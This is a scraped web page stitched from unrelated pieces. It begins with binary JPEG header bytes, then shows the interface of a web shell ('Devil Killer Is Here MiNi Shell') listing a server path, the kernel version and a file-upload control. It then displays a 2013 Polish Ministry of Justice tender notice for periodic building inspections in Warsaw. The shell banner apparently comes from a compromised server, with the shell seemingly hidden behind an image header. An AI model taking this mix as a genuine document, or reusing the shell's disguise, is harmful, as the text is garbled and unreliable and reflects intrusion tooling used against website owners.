JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130515/190634-N-2013.html

<p class="kh_header"><b>Warszawa: Przeprowadzenie okresowej kontroli stanu technicznego obiektów budowlanych będących w trwałym zarządzie Ministerstwa Sprawiedliwości, położonych przy Al. Ujazdowskich 11, Al. Ujazdowskich 19, Al. Róż 2, ul. Chopina 1 i ul. Czerniakowskiej 100 w Warszawie</b><br>
<b>Numer ogłoszenia: 190634 - 2013; data zamieszczenia: 15.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Sprawiedliwości , Al. Ujazdowskie 11, 00-950 Warszawa, woj. mazowieckie, tel. 22 5212773, 5212888, 5212214, faks 22 6289785, 5212697.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ms.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie okresowej kontroli stanu technicznego obiektów budowlanych będących w trwałym zarządzie Ministerstwa Sprawiedliwości, położonych przy Al. Ujazdowskich 11, Al. Ujazdowskich 19, Al. Róż 2, ul. Chopina 1 i ul. Czerniakowskiej 100 w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie okresowej kontroli stanu technicznego obiektów budowlanych, będących w trwałym zarządzie Ministerstwa Sprawiedliwości. Przedmiot zamówienia jest podzielony na cześć części :
A  -  Cześć  I  zamówienia : 
1.  przedmiotem  zamówienia  dla  I  części  jest :  wykonanie  okresowej,  półrocznej  kontroli stanu technicznego w zakresie branży  budowlanej obiektu  Ministerstwa Sprawiedliwości przy ul. Czerniakowskiej 100 w Warszawie, zgodnie z art. 62 ust. 1  pkt  3  ustawy  Prawo   budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623  ze  zm.),  zwanej  dalej : Prawem  budowlanym.
2.   zakres  kontroli  obejmuje  sprawdzenie  stanu  technicznego i bezpiecznego  użytkowania   obiektu  w  zakresie :
a) elementów budynku, budowli i instalacji narażonych na szkodliwe wpływy atmosferyczne i niszczące działania czynników występujących podczas użytkowania   obiektu, b)  instalacji  i  urządzeń  służących  ochronie  środowiska, c)  sprawdzenia  wykonania  zaleceń  z  poprzedniej  kontroli, d)  opracowanie  protokołu  z  dokonanej  kontroli  stanu  technicznego  obiektu.

3.   przewidywane  terminy  kontroli :
      a)   kontrola  jesienna        -   do   30  listopada  2013  r.,
      b)   kontrola  wiosenna      -   do   31  maja  2014  r. 


B  -  II  część  zamówienia : 
    
 1.  przedmiotem  zamówienia  dla  II  części  zamówienia jest : wykonanie  okresowej,  półrocznej  kontroli  stanu  technicznego  w  zakresie  branży  kominiarskiej  obiektu  Ministerstwa  Sprawiedliwości  przy  ul. Czerniakowskiej 100  w  Warszawie,  zgodnie  z  art.    62  ust. 1  pkt  3   Prawa   budowlanego.   

2.  zakres  kontroli  obejmuje :
a)  sprawdzenie  stanu  technicznego  i  bezpiecznego  użytkowania  obiektu  w  zakresie  przewodów  kominowych  (dymowych,  spalinowych  i  wentylacyjnych),
b)  sprawdzenie  prawidłowości  podłączeń  przewodów  i  zastosowanych  przekrojów, c) czyszczenie  przewodów  wentylacyjnych, dymowych  i  spalinowych,  z  usunięciem  zanieczyszczeń  przywracających  pełną  drożność  przewodów, d) wykonanie  pomiarów  przepływu  strumienia  powietrza  z  pełną  analizą  wpływu  na  pozostały  układ  systemu  wentylacyjnego, e)  sprawdzenie  zabezpieczeń  wylotów  kominowych  ponad  dachem, f)  wykonanie  szkiców  przewodów  kominowych, g)  sprawdzenie  wykonania  zaleceń  z  poprzedniej  kontroli, h)  opracowanie  protokołu  z  dokonanej  kontroli  stanu  technicznego  obiektu.

3.   przewidywane  terminy  kontroli :

a)   kontrola  jesienna         -   do  30  listopada  2013  r.
b)   kontrola  wiosenna       -   do  31  maja  2014  r.

C  -  III  część  zamówienia : 

1.  przedmiotem  zamówienia  dla  III  części  zamówienia  jest : wykonanie  okresowej,  rocznej  kontroli  stanu  technicznego  w  zakresie  branży budowlanej  obiektów  Ministerstwa  Sprawiedliwości  przy Al. Ujazdowskich 11,  Al.  Ujazdowskich  19, Al. Róż 2  oraz przy ul. Chopina 1 w  Warszawie, zgodnie  z  art.  62  ust. 1  pkt 1  Prawa  budowlanego.

2.  zakres  kontroli  obejmuje sprawdzenie  stanu  technicznego  i  bezpiecznego  użytkowania  ww.  obiektów   w  zakresie :
a) elementów budynków, budowli i instalacji narażonych na szkodliwe wpływy   atmosferyczne i niszczące działanie czynników występujących podczas użytkowania  obiektów, b)   instalacji  i  urządzeń  służących  ochronie  środowiska,
c)   sprawdzenia  wykonania  zaleceń  z  poprzedniej  kontroli, d)  opracowania  protokołu  z  dokonanej  kontroli  stanu  technicznego obiektów.

3.   przewidywane  terminy  kontroli :
a)   kontrolę obiektu przy Al. Ujazdowskich 11 należy przeprowadzić do 30 września 2013 r., b)   kontrolę  pozostałych  obiektów, tj. przy  Al. Ujazdowskich  19, Al. Róż 2  oraz  przy  ul.  Chopina  1  w  Warszawie  należy  przeprowadzić  do  15  października  2013  r.

D  -  IV  część  zamówienia :      

1.  przedmiotem  zamówienia  dla  IV  części  zamówienia jest : wykonanie  okresowej,  pięcioletniej  kontroli  stanu  technicznego  w  zakresie  branży  budowlanej  obiektu  Ministerstwa  Sprawiedliwości  przy  Al. Ujazdowskich 11, zgodnie  z  art.  62  ust. 1  pkt  2  Prawa  budowlanego.   

2.  zakres  kontroli  obejmuje :a)  sprawdzenie  w zakresie stanu  technicznego  obiektu budowlanego, b)  sprawdzenie  w zakresie przydatności do użytkowania obiektu budowlanego, c)  sprawdzenie  w zakresie estetyki obiektu budowlanego oraz jego otoczenia, d)  sprawdzenie  w zakresie bezpiecznego użytkowania obiektu, e)  sprawdzenie wykonania zaleceń z poprzedniej kontroli,f)  opracowanie  protokołu  z  dokonanej  kontroli  stanu  technicznego.

3.   przewidywany  termin  kontroli  -  do  30  września  2013  r.

E  -  V  część  zamówienia :

1.  przedmiotem  zamówienia  dla  V  części  zamówienia jest : wykonanie okresowej, pięcioletniej  kontroli  stanu  technicznego  w  zakresie  branży  elektrycznej  obiektów  przy   Al.  Ujazdowskich  19,  Al.  Róż   2, ul.  Chopina  1  oraz  przy  ul. Czerniakowskiej  100  w  Warszawie,  zgodnie  z  art.  62  ust.  1  pkt  2  Prawa  budowlanego.

2.  zakres  kontroli  obejmuje :
a)  sprawdzenie w zakresie badania instalacji elektrycznej i piorunochronnej ze sprawdzeniem   stanu   sprawności  połączeń,  osprzętu,   zabezpieczeń   i   środków  ochrony  od  porażeń, oporności  izolacji  przewodów  oraz  uziemień  instalacji i aparatów,  b)  sprawdzenie   dokręcenia   zacisków   łączeniowych   przewodów  osprzętu  elektrycznego rozdzielczego,  c)  sprawdzenie  równomierności  obciążeń  linii  zasilających, d)  sprawdzenie  wykonania  zaleceń  z  poprzedniej  kontroli, e)  opracowanie protokołu z dokonanej kontroli stanu technicznego i pomiarów kontrolnych.

3.  przewidywany  termin  kontroli  -  do  31   lipca   2013  r.

F  -  VI  część  zamówienia :

1.  przedmiotem  zamówienia  dla  VI  części  zamówienia jest : wykonanie okresowej, pięcioletniej oceny  efektywności  energetycznej  urządzeń chłodniczych  w systemach  klimatyzacji, zgodnie z art. 62 ust.  pkt 6 Prawa budowlanego. Roczną kontrolą stanu technicznego objęte są  obiekty  przy  Al. Ujazdowskich 11,  Al.  Ujazdowskich  19,   ul.  Chopina  1  oraz  przy  ul.  Czerniakowskiej  100  w  Warszawie.

2.  zakres  kontroli  obejmuje  ocenę  efektywności  energetycznej  zastosowanych  urządzeń  chłodniczych  w  systemach  klimatyzacji,  ich  wielkości  w  stosunku  do  wymagań  użytkowych  o  mocy  chłodniczej  nominalnej  większej  niż  12  kW oraz  opracowanie  protokołu  z  dokonanej  oceny  technicznej.

3.  wykaz  urządzeń  chłodniczych  w  systemach  klimatyzacji, objętych  kontrolą zawiera  tabela w Rozdziale III  ust. 2, pkt G, ppkt 3  SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.63.13.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek posiadania wiedzy  i  doświadczenia          w  przypadku  gdy  Wykonawca  wykaże, że  w  okresie  ostatnich  3  lat  przed  upływem  terminu  składania  ofert,  a  jeżeli  okres  prowadzenia  działalności  jest  krótszy - w  tym  okresie,  wykonał, zrealizował : a) dla  części  I zamówienia - co najmniej  jedną  usługę  kontroli  stanu  technicznego w  zakresie  branży  budowlanej  obiektu  budowlanego (budynku) o  kubaturze  nie  mniejszej niż 10 000 m3,  b) dla części II zamówienia - co  najmniej jedną  usługę  kontroli  stanu  technicznego  w  zakresie branży  kominiarskiej obiektu  budowlanego (budynku)  o  kubaturze  nie  mniejszej  niż  10 000  m3, c) dla części III zamówienia - co najmniej jedną usługę kontroli stanu technicznego  w  zakresie  branży  budowlanej  obiektu  budowlanego (budynku) o kubaturze  nie mniejszej  niż  10  000  m3, d) dla części IV zamówienia - co najmniej jedną  usługę  kontroli  stanu  technicznego  w  zakresie branży  budowlanej   obiektu  budowlanego (budynku)  o  kubaturze  nie  mniejszej  niż  10 000  m3, e)	dla części V zamówienia - co  najmniej  jedną  okresową, pięcioletnią  usługę  kontroli  stanu  technicznego  instalacji  elektrycznej, zgodnie  z  art.  62  ust. 1  pkt  2   Prawa  budowlanego, f dla  części VI zamówienia - co  najmniej  jedną  usługę  trwającą  przynajmniej przez okres 24 miesięcy i polegającą na konserwacji instalacji i urządzeń  chłodniczych  w systemach  klimatyzacji  o  mocy chłodniczej  nominalnej  większej   niż  12   kW.   

Do wykazu (dla  każdej  z  części ) należy dołączyć oryginał lub kopię dowodów, poświadczonych  za  zgodność  z  oryginałem  przez  Wykonawcę,  potwierdzających  to, że  wskazana  usługa  została  wykonana  lub  jest  wykonywana należycie. Dowodami, o których mowa wyżej  są : a)  poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert; b)  oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w  ppkt a). Wykonawca w miejsce poświadczenia, o którym mowa w ppkt a), może przedłożyć dokumenty  potwierdzające  należyte  wykonanie  usług  określone w § 1 ust. 2 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z  2009  r. Nr 226, poz. 1817).   W  przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane  w wykazie, o którym mowa w pkt   1.1.1., zostały wcześniej wykonane, Wykonawca nie ma obowiązku  przedkładania  dowodów,  o  których  mowa  w  pkt   1.1.1. 
Usługa  główna  (dla  każdej  z  6 części) , o  której  mowa  w  pkt  1.1. -  to  usługa  o  zakresie przedmiotowym i  czasowym  nie  mniejszym  niż  zakres  usługi  wymienionej   w  Rozdziale  V  ust. 2  pkt  2.2.1.
Żądany wykaz głównych  usług (dla każdej z 6 części) musi zawierać co najmniej jedną   główną  usługę, o  której  mowa   wyżej. 
Dokument, o którym mowa wyżej (wykaz głównych usług) Wykonawca jest zobowiązany złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem  przez  Wykonawcę. W przypadku polegania przez Wykonawcę na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków, Wykonawca jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - oryginał dokumentu lub kopia (odpis) poświadczona(-y)  notarialnie. Zgodnie z art. 26  ust.  2b  ustawy - odpowiednio  Wykonawca  może  polegać  na  wiedzy  i  doświadczeniu,potencjale  technicznym,  osobach  zdolnych  do  wykonania  zamówienia  lub  zdolnościach  finansowych innych  podmiotów,  niezależnie  od  charakteru  prawnego łączących  go  z  nim  stosunków.  Wykonawca  w  takiej  sytuacji  jest  zobowiązany  udowodnić  Zamawiającemu,   iż  będzie  dysponował  zasobami  niezbędnymi  do  realizacji  zamówienia, w  szczególności  przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania  mu  do  dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu  zamówienia. Zamawiający przewiduje możliwość zmiany ww. innego podmiotu w trakcie realizacji zamówienia pod warunkiem, że Wykonawca  wykaże,  iż  wskazany nowy podmiot  -  spełnia  warunki  w zakresie nie mniejszym niż wskazany na etapie postępowania  o  zamówienie  publiczne  dotychczasowy,  inny  podmiot.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na  potwierdzenie  spełnienia  warunku  w  zakresie  dysponowania  przez  Wykonawcę  osobami zdolnymi  do  wykonania  przedmiotu  zamówienia - Zamawiający  żąda  złożenia  wraz  z  ofertą  (dla  każdej  z  sześciu części odrębnie) oryginału  lub  kopii   poświadczonej  za zgodność z oryginałem przez osobę/osoby uprawnioną/uprawnione  do  reprezentowania Wykonawcy, wykazu osób,  które  będą uczestniczyć    w   wykonywaniu   danej   części   zamówienia,  zawierającego  co   najmniej  informacje :

1.2.1.  -  dla  I  części  zamówienia : a)    imiona  i  nazwiska  osób  (co najmniej jedna osoba), b)    zakres  czynności   jakie   ww.  osoby   będą   wykonywały  przy  realizacji  przedmiotu tej  części  zamówienia, c)  dotyczące  kwalifikacji   zawodowych  ww.  osób, opisanych  w  Rozdziale V  pkt  2.2.2., lit. a) tj. posiadania  uprawnień  budowlanych   w   nieograniczonym  zakresie  w  branży budowlanej  (w  specjalności  konstrukcyjno-budowlanej)   oraz   w  branży  sanitarnej, np.  poprzez  podanie  numeru  uprawnień  budowlanych oraz  ich  zakresu  i  podanie  informacji  o  przynależności  do   okręgowej  izby  samorządu  zawodowego, d)  podstawę   dysponowania  osobą,  np. poprzez sformułowanie :  bezpośrednio - na podstawie   umowy   o   pracę,  umowy  zlecenia, umowy  o  dzieło  lub pośrednio - np.  zobowiązanie  innego  podmiotu. 

1.2.2. - dla  II części  zamówienia :   
a)    imiona  i  nazwiska  osób  (co  najmniej  jedna  osoba), b)   zakres  czynności   jakie   ww.  osoby   będą   wykonywały  przy  realizacji  przedmiotu tej  części  zamówienia, c)   dotyczące  kwalifikacji  zawodowych  ww.  osób, opisanych  w  Rozdziale  V  pkt  2.2.2. lit.   b),  tj.   posiadania    dyplomu    mistrza    kominiarskiego,  wydanego   przez   Izbę  rzemieślniczą, np.  poprzez  podanie  numeru  dyplomu  mistrza  kominiarskiego.d)  podstawę  dysponowania    osobą,  np.  poprzez  sformułowanie :  bezpośrednio -   na  podstawie  umowy   o   pracę,  umowy  zlecenia, umowy  o  dzieło lub pośrednio - np.zobowiązanie innego  podmiotu.

1.2.3. - dla  III  części  zamówienia :
a)    imiona  i  nazwiska  osób  (co najmniej jedna osoba),b)    zakres  czynności   jakie   ww.  osoby   będą   wykonywały  przy  realizacji  przedmiotu tej  części  zamówienia, c)    dotyczące  kwalifikacji   zawodowych  ww.  osób, opisanych  w  Rozdziale V  pkt  2.2.2.,  lit. c) tj.  posiadania  uprawnień  budowlanych   w   nieograniczonym  zakresie  w  branży  budowlanej  (w   specjalności konstrukcyjno-budowlanej)  oraz  w  branży  sanitarnej,  np.  poprzez  podanie  numeru uprawnień  budowlanych  oraz  ich  zakresu  i podanie informacji  o przynależności  do  okręgowej  izby  samorządu  zawodowego,  d)  podstawę  dysponowania osobą,  np.    poprzez    sformułowanie :  bezpośrednio - na  podstawie  umowy  o   pracę,  umowy  zlecenia, umowy  o  dzieło  lub  pośrednio -  np. zobowiązanie  innego  podmiotu.

1.2.4. - dla IV  części  zamówienia :
a)   imiona  i  nazwiska  osób  (co  najmniej  jedna  osoba), b)   zakres  czynności   jakie   ww.  osoby   będą   wykonywały  przy  realizacji  przedmiotu tej  części  zamówienia, c)   dotyczące  kwalifikacji   zawodowych  ww.  osób, opisanych  w  Rozdziale V  pkt  2.2.2.,  lit. d) tj.  posiadania  uprawnień budowlanych  w  nieograniczonym  zakresie  w  branży budowlanej  (w   specjalności  konstrukcyjno-budowlanej)  oraz  w  branży  sanitarnej,  np. poprzez  podanie  numeru  uprawnień  budowlanych oraz  ich  zakresu  i  podanie informacji  o  przynależności  do  okręgowej  izby  samorządu  zawodowego,  d)   podstawę   dysponowania osobą, np. poprzez  sformułowanie :  bezpośrednio - na podstawie  umowy o pracę, umowy zlecenia, umowy o dzieło lub pośrednio- np. zobowiązanie  innego  podmiotu.

   1.2.5. - dla  V  części  zamówienia :
a)     imiona  i  nazwiska  osób  (co najmniej dwie osoby), b) dotyczące liczby lat   doświadczenia  w eksploatacji instalacji elektroenergetycznych, c)  dotyczące  kwalifikacji zawodowych  ww.  osób, opisanych  w  Rozdziale V  pkt  2.2.2., lit. e), tj. posiadania  przez co   najmniej  jedną  z  tych  osób świadectwa  kwalifikacji  w  zakresie   dozoru   nad  eksploatacją   urządzeń,  instalacji   oraz  sieci  energetycznych do  1 kV, a przez  drugą  z  tych  osób  posiadania  świadectwa  kwalifikacji  w  zakresie eksploatacji  urządzeń, instalacji  oraz  sieci energetycznych  do  1 kV,   d)   podstawę   dysponowania osobą, np. poprzez  sformułowanie :  bezpośrednio - na podstawie  umowy o  pracę, umowy zlecenia, umowy o dzieło  lub pośrednio - np. zobowiązanie  innego  podmiotu.

1.2.6. - dla  VI  części  zamówienia :
a)    imiona  i  nazwiska  osób  (co najmniej dwie osoby), b) dotyczące liczby   lat  doświadczenia  w zakresie eksploatacji urządzeń instalacji klimatyzacyjnych i chłodniczych o mocy powyżej 50 kW, c)  dotyczące  kwalifikacji zawodowych  ww. osób, opisanych  w  Rozdziale V  pkt  2.2.2.,lit. f), tj. posiadania przez co najmniej  jedną  z  tych osób świadectwa  kwalifikacji  w zakresie dozoru nad eksploatacją urządzeń,  instalacji klimatyzacyjnych i chłodniczych o  mocy powyżej 50 kW, a  przez  drugą z tych osób  posiadania  świadectwa kwalifikacji w zakresie eksploatacji urządzeń, instalacji klimatyzacyjnych i chłodniczych o  mocy  powyżej  50  kW, d)  podstawę dysponowania osobą, np. poprzez sformułowanie : bezpośrednio -  na podstawie  umowy  o  pracę, umowy zlecenia, umowy  o  dzieło  lub pośrednio - np. zobowiązanie  innego  podmiotu.
 Zgodnie z art. 26  ust.  2b  ustawy - (odpowiednio  do  ww.  pkt  1.1  i  1.2 )  Wykonawca  może  polegać  na  wiedzy  i  doświadczeniu, potencjale  technicznym,  osobach  zdolnych  do  wykonania  zamówienia  lub  zdolnościach  finansowych innych  podmiotów,  niezależnie  od  charakteru  prawnego  łączących  go  z  nim  stosunków.  Wykonawca  w  takiej  sytuacji  jest  zobowiązany  udowodnić  Zamawiającemu,   iż  będzie  dysponował  zasobami  niezbędnymi  do  realizacji  zamówienia, w  szczególności  przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania  mu  do  dyspozycji niezbędnych zasobów na okres korzystania  z  nich  przy  wykonywaniu  zamówienia - oryginał  dokumentu (dokumentów)  lub  kopia (odpis)  poświadczona (-y)  notarialnie. W  przypadku  gdy  Wykonawca  dysponuje  bezpośrednio  osobami  zdolnymi  do  wykonania  zamówienia - nie  musi  składać  zobowiązania, o  którym  mowa  wyżej.  Wystarczy jeśli  w  wykazie  tych  osób  wskaże, że dysponuje  nimi  bezpośrednio  w  formie  np.  umowy  o  pracę  lub  umowy  cywilno - prawnej.  Zamawiający przewiduje możliwość zmiany przez  Wykonawcę  ww. osób w trakcie realizacji zamówienia pod warunkiem, że wskazane przez  Wykonawcę  nowe, inne  osoby  wykażą   spełnianie  warunków  udziału   w  zakresie   nie  mniejszym  niż  wskazane  na  etapie  postępowania  o  zamówienie  publiczne  osoby.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

